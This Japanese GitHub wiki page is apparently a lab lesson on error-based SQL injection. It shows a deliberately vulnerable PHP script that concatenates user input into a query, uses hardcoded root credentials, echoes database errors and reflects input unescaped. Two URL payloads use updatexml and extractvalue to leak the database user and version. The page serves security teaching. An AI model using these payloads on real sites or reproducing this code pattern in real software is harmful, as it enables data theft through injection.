SQLインジェクション 02 - yujitounai/helloworld GitHub Wiki

SQLインジェクション-02

エラーベースのSQLインジェクション

脆弱なソースコード (PHP)

<?php
function connectDB(){
    $dbserver = "mysql:host=mysql; dbname=vuln; charset=utf8";
    $dbusername = "root";
    $dbpassword = "root";
    try {
        $GLOBALS['pdo'] = new PDO($dbserver, $dbusername, $dbpassword);
        $GLOBALS['pdo']->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
        $msg = $e->getMessage();
    }
}
if(isset($_GET['id'])){
    connectDB();
    $id = filter_input(INPUT_GET,"id");
    try {
        $sql = "SELECT * FROM users where id =".$id." limit 1";
        $stmt = $pdo->prepare($sql);
        $stmt->execute();
	    $user = $stmt->fetch();
        if($user['id']){
            echo "<div class=\"main\">id ". $id ." is exist</div>";
        }else{
            echo "<div class=\"main\">id ". $id ." is not exist</div>";
        }
    } catch (PDOException $e) {
        $msg = $e->getMessage();
        echo $msg;
    }
}else {
    echo "usage: ?id=1";
    echo "<br>";
    highlight_file(__FILE__);
}
?>

攻撃方法

sqli-02.php?id=1%20and%20updatexml(1,concat(0x3a,user()),1)

sqli-02.php?id=1%20and%20extractvalue(1,concat(%27/%27,version()));

⚠️ **GitHub.com Fallback** ⚠️